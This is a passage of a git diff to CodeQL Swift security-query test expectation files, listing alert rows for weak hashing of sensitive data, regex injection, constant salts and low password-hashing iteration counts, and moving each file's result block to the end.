| testCryptoKit.swift:178:32:178:32 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:184:32:184:32 | cert | testCryptoKit.swift:184:32:184:32 | cert | testCryptoKit.swift:184:32:184:32 | cert | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:184:32:184:32 | cert | sensitive data (credential cert) | +| testCryptoKit.swift:186:32:186:32 | account_no | testCryptoKit.swift:186:32:186:32 | account_no | testCryptoKit.swift:186:32:186:32 | account_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:186:32:186:32 | account_no | sensitive data (private information account_no) | +| testCryptoKit.swift:187:32:187:32 | credit_card_no | testCryptoKit.swift:187:32:187:32 | credit_card_no | testCryptoKit.swift:187:32:187:32 | credit_card_no | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:187:32:187:32 | credit_card_no | sensitive data (private information credit_card_no) | +| testCryptoKit.swift:231:44:231:44 | value1 | testCryptoKit.swift:230:23:230:23 | cardNumber | testCryptoKit.swift:231:44:231:44 | value1 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:230:23:230:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoKit.swift:235:39:235:39 | value2 | testCryptoKit.swift:233:23:233:23 | cardNumber | testCryptoKit.swift:235:39:235:39 | value2 | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:233:23:233:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoKit.swift:238:51:238:51 | value3 | testCryptoKit.swift:237:23:237:23 | cardNumber | testCryptoKit.swift:238:51:238:51 | value3 | Insecure hashing algorithm (MD5) depends on $@. 
| testCryptoKit.swift:237:23:237:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoKit.swift:251:43:251:43 | value | testCryptoKit.swift:240:23:240:23 | cardNumber | testCryptoKit.swift:251:43:251:43 | value | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:240:23:240:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoKit.swift:255:37:255:37 | value | testCryptoKit.swift:243:23:243:23 | cardNumber | testCryptoKit.swift:255:37:255:37 | value | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:243:23:243:23 | cardNumber | sensitive data (private information cardNumber) | +| testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:153:30:153:30 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:156:31:156:31 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:166:20:166:20 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. 
| testCryptoSwift.swift:169:21:169:21 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:182:9:182:9 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:185:9:185:9 | phoneNumberArray | sensitive data (private information phoneNumberArray) | +| testCryptoSwift.swift:200:9:200:9 | medicalData | testCryptoSwift.swift:200:9:200:9 | medicalData | testCryptoSwift.swift:200:9:200:9 | medicalData | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:200:9:200:9 | medicalData | sensitive data (private information medicalData) | +| testCryptoSwift.swift:203:9:203:9 | medicalData | testCryptoSwift.swift:203:9:203:9 | medicalData | testCryptoSwift.swift:203:9:203:9 | medicalData | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:203:9:203:9 | medicalData | sensitive data (private information medicalData) | +| testCryptoSwift.swift:218:9:218:9 | creditCardNumber | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:218:9:218:9 | creditCardNumber | sensitive data (private information creditCardNumber) | +| testCryptoSwift.swift:221:9:221:9 | creditCardNumber | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | testCryptoSwift.swift:221:9:221:9 | creditCardNumber | Insecure hashing algorithm (SHA1) depends on $@. 
| testCryptoSwift.swift:221:9:221:9 | creditCardNumber | sensitive data (private information creditCardNumber) | diff --git a/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.expected b/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.expected index 04dafbd0b5e9..1a26f9211971 100644 --- a/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.expected +++ b/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.expected 
@@ -1,27 +1,3 @@ -#select -| tests.swift:101:16:101:16 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:101:16:101:16 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:104:16:104:40 | ... .+(_:_:) ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:104:16:104:40 | ... .+(_:_:) ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:106:16:106:16 | "..." | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:106:16:106:16 | "..." | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:109:16:109:39 | ... ? ... : ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:109:16:109:39 | ... ? ... : ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:110:16:110:37 | ... ? ... : ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:110:16:110:37 | ... ? ... : ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:113:24:113:24 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:113:24:113:24 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:114:45:114:45 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:114:45:114:45 | taintedString | This regular expression is constructed from a $@. 
| tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:120:19:120:19 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:120:19:120:19 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:126:40:126:40 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:126:40:126:40 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:131:39:131:39 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:131:39:131:39 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:137:40:137:40 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:137:40:137:40 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:144:16:144:16 | remoteInput | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:144:16:144:16 | remoteInput | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:147:39:147:39 | regexStr | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:147:39:147:39 | regexStr | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:162:17:162:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:162:17:162:17 | taintedString | This regular expression is constructed from a $@. 
| tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:164:17:164:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:164:17:164:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:167:17:167:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:167:17:167:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:170:17:170:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:170:17:170:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:173:17:173:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:173:17:173:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:176:17:176:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:176:17:176:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:179:17:179:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:179:17:179:17 | taintedString | This regular expression is constructed from a $@. 
| tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:182:17:182:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:182:17:182:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:185:17:185:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:185:17:185:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:190:21:190:21 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:190:21:190:21 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | edges | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:101:16:101:16 | taintedString | provenance | | | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:104:16:104:40 | ... .+(_:_:) ... | provenance | | 
@@ -72,3 +48,27 @@ nodes | tests.swift:185:17:185:17 | taintedString | semmle.label | taintedString | | tests.swift:190:21:190:21 | taintedString | semmle.label | taintedString | subpaths +#select +| tests.swift:101:16:101:16 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:101:16:101:16 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:104:16:104:40 | ... .+(_:_:) ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:104:16:104:40 | ... .+(_:_:) ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:106:16:106:16 | "..." | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:106:16:106:16 | "..." | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:109:16:109:39 | ... ? ... : ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:109:16:109:39 | ... ? ... : ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:110:16:110:37 | ... ? ... : ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:110:16:110:37 | ... ? ... : ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:113:24:113:24 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:113:24:113:24 | taintedString | This regular expression is constructed from a $@. 
| tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:114:45:114:45 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:114:45:114:45 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:120:19:120:19 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:120:19:120:19 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:126:40:126:40 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:126:40:126:40 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:131:39:131:39 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:131:39:131:39 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:137:40:137:40 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:137:40:137:40 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:144:16:144:16 | remoteInput | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:144:16:144:16 | remoteInput | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:147:39:147:39 | regexStr | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:147:39:147:39 | regexStr | This regular expression is constructed from a $@. 
| tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:162:17:162:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:162:17:162:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:164:17:164:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:164:17:164:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:167:17:167:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:167:17:167:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:170:17:170:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:170:17:170:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:173:17:173:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:173:17:173:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:176:17:176:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:176:17:176:17 | taintedString | This regular expression is constructed from a $@. 
| tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:179:17:179:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:179:17:179:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:182:17:182:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:182:17:182:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:185:17:185:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:185:17:185:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:190:21:190:21 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:190:21:190:21 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected index d9388214b4b8..002454a3021d 100644 --- a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected +++ b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected 
@@ -1,22 +1,3 @@ -#select -| rncryptor.swift:63:57:63:57 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:63:57:63:57 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:65:55:65:55 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:65:55:65:55 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:68:106:68:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:68:106:68:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:69:131:69:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:69:131:69:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:71:106:71:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:71:106:71:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:72:131:72:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:72:131:72:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:75:127:75:127 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:75:127:75:127 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. 
| rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:76:152:76:152 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:76:152:76:152 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:78:135:78:135 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:78:135:78:135 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:79:160:79:160 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:79:160:79:160 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| test.swift:51:49:51:49 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:51:49:51:49 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | -| test.swift:52:49:52:49 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:52:49:52:49 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | -| test.swift:56:59:56:59 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:56:59:56:59 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | -| test.swift:57:59:57:59 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:57:59:57:59 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. 
| test.swift:29:3:29:3 | this string is constant | this string is constant | -| test.swift:62:59:62:59 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:62:59:62:59 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | -| test.swift:63:59:63:59 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:63:59:63:59 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | -| test.swift:67:53:67:53 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:67:53:67:53 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | -| test.swift:68:53:68:53 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:68:53:68:53 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | edges | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:63:57:63:57 | myConstantSalt1 | provenance | | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:68:106:68:106 | myConstantSalt1 | provenance | | 
@@ -72,3 +53,22 @@ nodes | test.swift:67:53:67:53 | constantSalt | semmle.label | constantSalt | | test.swift:68:53:68:53 | constantStringSalt | semmle.label | constantStringSalt | subpaths +#select +| rncryptor.swift:63:57:63:57 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:63:57:63:57 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:65:55:65:55 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:65:55:65:55 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:68:106:68:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:68:106:68:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:69:131:69:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:69:131:69:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:71:106:71:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:71:106:71:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:72:131:72:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:72:131:72:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. 
| rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:75:127:75:127 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:75:127:75:127 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:76:152:76:152 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:76:152:76:152 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:78:135:78:135 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:78:135:78:135 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:79:160:79:160 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:79:160:79:160 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| test.swift:51:49:51:49 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:51:49:51:49 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | +| test.swift:52:49:52:49 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:52:49:52:49 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | +| test.swift:56:59:56:59 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:56:59:56:59 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] 
| +| test.swift:57:59:57:59 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:57:59:57:59 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | +| test.swift:62:59:62:59 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:62:59:62:59 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | +| test.swift:63:59:63:59 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:63:59:63:59 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | +| test.swift:67:53:67:53 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:67:53:67:53 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | +| test.swift:68:53:68:53 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:68:53:68:53 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | diff --git a/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.expected b/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.expected index a0b4f7370321..aff512f05123 100644 --- a/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.expected +++ b/swift/ql/test/query-tests/Security/CWE-916/InsufficientHashIterations.expected 
@@ -1,8 +1,3 @@ -#select -| test.swift:37:84:37:84 | lowIterations | test.swift:20:45:20:45 | 99999 | test.swift:37:84:37:84 | lowIterations | The value '99999' is an insufficient number of iterations for secure password hashing. | -| test.swift:38:84:38:84 | 80000 | test.swift:38:84:38:84 | 80000 | test.swift:38:84:38:84 | 80000 | The value '80000' is an insufficient number of iterations for secure password hashing. | -| test.swift:44:84:44:84 | lowIterations | test.swift:20:45:20:45 | 99999 | test.swift:44:84:44:84 | lowIterations | The value '99999' is an insufficient number of iterations for secure password hashing. | -| test.swift:45:84:45:84 | 80000 | test.swift:45:84:45:84 | 80000 | test.swift:45:84:45:84 | 80000 | The value '80000' is an insufficient number of iterations for secure password hashing. | edges | test.swift:20:45:20:45 | 99999 | test.swift:33:22:33:43 | call to getLowIterationCount() | provenance | | | test.swift:33:22:33:43 | call to getLowIterationCount() | test.swift:37:84:37:84 | lowIterations | provenance | | 
@@ -15,3 +10,8 @@ nodes | test.swift:44:84:44:84 | lowIterations | semmle.label | lowIterations | | test.swift:45:84:45:84 | 80000 | semmle.label | 80000 | subpaths +#select +| test.swift:37:84:37:84 | lowIterations | test.swift:20:45:20:45 | 99999 | test.swift:37:84:37:84 | lowIterations | The value '99999' is an insufficient number of iterations for secure password hashing. | +| test.swift:38:84:38:84 | 80000 | test.swift:38:84:38:84 | 80000 | test.swift:38:84:38:84 | 80000 | The value '80000' is an insufficient number of iterations for secure password hashing. | +| test.swift:44:84:44:84 | lowIterations | test.swift:20:45:20:45 | 99999 | test.swift:44:84:44:84 | lowIterations | The value '99999' is an insufficient number of iterations for secure password hashing. | +| test.swift:45:84:45:84 | 80000 | test.swift:45:84:45:84 | 80000 | test.swift:45:84:45:84 | 80000 | The value '80000' is an insufficient number of iterations for secure password hashing. | From d590687904c15c3793da65a909697d87fe8dd76d Mon Sep 17 00:00:00 2001 
